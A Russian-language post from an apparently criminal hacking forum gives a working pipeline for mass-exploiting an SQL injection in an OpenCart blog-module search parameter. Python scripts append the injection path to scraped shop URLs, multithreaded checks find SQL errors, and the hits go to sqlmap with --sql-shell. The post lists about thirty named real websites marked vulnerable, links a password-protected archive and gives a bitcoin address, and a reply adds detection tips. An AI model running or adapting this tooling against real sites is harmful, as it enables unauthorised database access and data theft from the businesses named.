• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья [LVL 0] 1337 H4k GAME by grader | Python scripts

MembRupt

ripper
КИДАЛА
Регистрация
13.02.2023
Сообщения
196
Реакции
130
Гарант сделки
2
Пожалуйста, обратите внимание, что пользователь заблокирован
На основе следующих топиков: https://xss.pro/threads/30928/ , https://xss.pro/threads/80413/

Набросал парочку скриптов для автоматизации действий...
После парсинга линков на шопы добавляем нужный нам путь, в нашем случае путь "index.php?route=extension/d_blog_module/search&tag=xss'", либо другой из списка выложеных 0дэй от grader.

Устанавливаем:
Код:
pip install requests
pip install ThreadPoolExecutorPlus

После установки запускаем первый скрипт...

Используем следующий код:
Python:
# читаем список сайтов из текстового файла
with open('links.txt', 'r') as file:
    sites = file.readlines()

# добавляем путь в конец каждого линка
sites = [site.strip() + "index.php?route=extension/d_blog_module/search&tag=xss'" for site in sites]

# записываем готовый список сайтов в файл
with open('go_check_sql.txt', 'w') as file:
    file.write('\n'.join(sites))

Перед выполнением нужно создать файл "go_check_sql.txt".

Следующим шагом идет проверка на наличие уязвимости. Визуально мы получаем примерно следующую ошибку:
Код:
Uncaught Exception: Error: You have an error in your SQL syntax;

Пишем проверку уже готового списка наших линков на наличие определенного слова.
Python:
import requests
import csv
from concurrent.futures import ThreadPoolExecutor

# читаем список сайтов
with open('go_check_sql.txt', 'r') as file:
    sites = file.readlines()

# заданное сообщение для поиска
search_text = 'SQL'

# открываем файл для записи результатов
with open('results.txt', 'w', newline='') as file:
    writer = csv.writer(file)

    # определяем функцию для выполнения запроса и записи результата
    def check_site(site):
        site = site.strip()
        try:
            response = requests.get(site)
            if response.status_code == 200 and search_text in response.text:
                print(f'Сайт {site} имеет SQL-inj')
                writer.writerow([site, 'есть'])
            else:
                print(f'Сайт {site} не имеет SQL-inj')
                writer.writerow([site, 'нет'])
        except requests.exceptions.RequestException as e:
            print(f'Site Error {site}: {e}')
            writer.writerow([site, 'ошибка'])

    # создаем пул потоков и запускаем выполнение функций
    with ThreadPoolExecutor(max_workers=30) as executor:
        futures = []
        for site in sites:
            futures.append(executor.submit(check_site, site))

        # ожидаем завершения всех потоков
        for future in futures:
            future.result()

Для скорости выполнения реализована многопоточность. Значение "max_workers=30" заменяем на свое.
После окончания работы - все линки будут записаны в текстовый документ results.txt с пометками в конце ссылок "есть" "нет".
Избавляемся от ненужных линков, где уязвимость не присутствует - с помощью следующего кода.

Python:
# открываем файл
with open('results.txt', 'r') as input_file:
    # читаем все строки в список
    lines = input_file.readlines()

# инициализируем список для хранения найденных строк
found_lines = []

# проходим по каждой строке и ищем слово "есть"
for line in lines:
    if 'есть' in line:
        found_lines.append(line)

# открываем файл для записи
with open('est.txt', 'w') as output_file:
    # записываем найденные строки в новый файл
    for line in found_lines:
        output_file.write(line)

На выходе получаем список сайтов (файл est.txt) где было найдено слово 'SQL' (можно заменить на свое), и с помощью уже готового вектора суем в sqlmap.
Python:
sqlmap.py -u "index.php?route=extension/d_blog_module/search&tag=xss" --dbms="MySQL" --sql-shell --tamper="between" --random-agent --batch --time-sec=10 --level=3 --risk=3

Окончательный пример работы:
Код:
https://www.springbridge.co.uk/blog-search?tag=aaa',есть
https://www.camisetasfutboleses.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://getonthewater.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://shop.korea-motors.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.hellfirearmory.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://shop.fiberopticproducts.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://korea-motors.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://smeertechniek.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.wittystore.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://sumorubber.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://www.cmr-direct.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://test.lituanicawholesale.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://silverhook.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.springbridge.co.uk/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://hbi.ca/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://alpineperformance.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.westarp-bs.de/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.studio9furniture.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.buyflorals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://twohotpeppers.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://www.cdkeysdeals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://k2minerals.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://bentleyparts.net/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://zonaorthodontics.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://essmak.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://standup22.shop/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://en.standup22.shop/index.php?route=extension/d_blog_module/search&tag=xssis',есть
https://buyselldonothing.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://storeitwell.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть
http://elektronikterazionline.com/index.php?route=extension/d_blog_module/search&tag=xssis',есть

Список скриптов уже в готовом формате .py:

URL: https://anonfiles.com/y2ibQ0abza/membrupt_zip
Пароль: xss

Может что упустил, прошу камнями не кидать, в данный момент лишь учусь и практикуюсь 🥰
По мере изучения нового - постараюсь добавлять что либо.


Если есть желание как либо отблагодарить, буду рад каждой копейке 🤗
btc: bc1q6u997a52v2nqcfm0dejmm35xvpdjhqfd04x6c8
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ребята, как не странно но никто не критиковал)
Я хорошо отношусь к критике, и мотивирую себя на лучшее.

По этому если что то есть не так - пишите, мне это важно.
Всем добра)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Cпасибо, я рад что тема получает развитие. В питон не вникал по этому реализовывал на php, по коду именно прокоментировать ни чего не смогу.

С ходу до тестов могу тебе обазначить 1 логическую ошибку:

Код:
Uncaught Exception: Error: You have an error in your SQL syntax;

Говорит о том, что найденный тобой ресурс - уязвим к error-based вектору, по мимо таких ресурсов, есть еще ресурсы не включившие отображение ошибок для всех. На них уязвимость будет сохранятся(cохранялась, не уверен за патч).

Код:
<h1 class="h1 title">Tag xssis</h1>
Код:
<title>Blog Search Result:</title>

Твои строки к поиску.

Далее, возникает вопрос, а что делать если сайт тебе выдает заглушку cloudflare, но на самом деле он уязвим.
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх